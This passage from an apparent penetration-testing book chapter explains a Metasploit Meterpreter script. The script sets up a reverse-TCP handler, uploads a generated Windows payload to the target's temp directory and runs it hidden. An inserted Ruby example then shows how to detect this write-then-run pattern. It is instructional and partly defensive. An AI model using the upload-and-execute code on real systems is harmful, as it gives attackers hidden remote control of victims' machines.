Chapter 16
mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.exploit_simple(
    'Payload'  => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
)
We define our payload as windows/meterpreter/reverse_tcp, generate the payload by calling client.framework.payloads.create(payload), and specify the necessary parameters to create the multi-handler. These are all the required fields we need to set our payload using the LHOST and LPORT options and create a listener.
Next we create our executable (win32pe meterpreter), upload it to our target machine, and execute it:
if client.platform =~ /win32|win64/
    tempdir = client.fs.file.expand_path("%TEMP%")
    print_status("Uploading meterpreter to temp directory...")
    raw = pay.generate
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    tempexe = tempdir + "\\" + filename
    tempexe.gsub!("\\\\", "\\")
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close
    print_status("Executing the payload on the system...")
    execute_payload = "#{tempdir}\\#{filename}"
    pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})
end
The variables called #{something} have already been defined within the script and will be called later. Notice that we already defined tempdir and filename. Moving into the script, we first include an if statement to detect whether the platform we are targeting is a Windows-based system; otherwise, the attack won't run. We then expand the temp directory on the target machine; this would be the equivalent of %TEMP%. Next we create a new file on the system and write out the new EXE we just generated from the ::Msf::Util::EXE.to_win32pe call. Remember that we passed 'Hidden' => true to session.sys.process.execute so that the target user won't see anything pop up on his side.
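The sequence the script produces on the target is observable from the defender's side: an executable is written into the user's %TEMP% directory and launched moments later. The Ruby below is an added example written for this edit, not code from the book or from the Metasploit framework; it shows the detection logic a host sensor pipeline could apply to file-write and process-start events. The event shape, timestamps and paths are constructed for the example, and the 60-second write-then-run window is an assumed threshold.

```ruby
# Constructed sample events (not real telemetry). Two event kinds are used:
#   file_write    -- a file was created or written on disk
#   process_start -- a new process image was launched
# 'ts' is a time in seconds; paths use Windows separators.
SAMPLE_EVENTS = [
  { 'ts' => 100, 'type' => 'file_write',    'path' => 'C:\\Users\\alice\\Documents\\report.docx' },
  { 'ts' => 101, 'type' => 'process_start', 'path' => 'C:\\Program Files\\Editor\\editor.exe' },
  { 'ts' => 200, 'type' => 'file_write',    'path' => 'C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe' },
  { 'ts' => 203, 'type' => 'process_start', 'path' => 'C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe' },
  { 'ts' => 900, 'type' => 'process_start', 'path' => 'C:\\Users\\bob\\AppData\\Local\\Temp\\installer.exe' },
].freeze

# Per-user and system temp locations, the directories the script's
# expand_path("%TEMP%") call resolves to on a typical Windows host.
TEMP_DIR_PATTERN = /\\AppData\\Local\\Temp\\|\\Windows\\Temp\\/i

def in_temp_dir?(path)
  !!(path =~ TEMP_DIR_PATTERN)
end

# Returns an array of findings, one per process_start from a temp directory.
# Severity is "high" when the same path was written within `window` seconds
# before it was executed (the write-then-run pattern of the script above),
# and "medium" when an executable runs from a temp directory with no recent
# write observed. Events are processed in timestamp order.
def find_temp_executions(events, window: 60)
  recent_writes = {} # normalised path => timestamp of the last write seen
  findings = []
  events.sort_by { |e| e['ts'] }.each do |ev|
    key = ev['path'].downcase
    case ev['type']
    when 'file_write'
      recent_writes[key] = ev['ts']
    when 'process_start'
      next unless in_temp_dir?(ev['path'])
      wrote_at = recent_writes[key]
      if wrote_at && ev['ts'] - wrote_at <= window
        findings << { 'event' => ev, 'severity' => 'high',
                      'reason' => "written #{ev['ts'] - wrote_at}s before execution" }
      else
        findings << { 'event' => ev, 'severity' => 'medium',
                      'reason' => 'executed from a temp directory' }
      end
    end
  end
  findings
end

if __FILE__ == $0
  find_temp_executions(SAMPLE_EVENTS).each do |f|
    puts "[#{f['severity']}] #{f['event']['path']}: #{f['reason']}"
  end
end
```

Correlating the write with the launch is what separates this from a noisy "anything in Temp" rule: installers legitimately run from temp directories, but an executable that appears and is launched within seconds, without a known installer as its parent, is worth a closer look.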
Putting this all together, our final script should look something like this:
# Meterpreter script for uploading and executing another meterpreter exe
info = "Simple script for uploading and executing an additional meterpreter payload"
#
# Options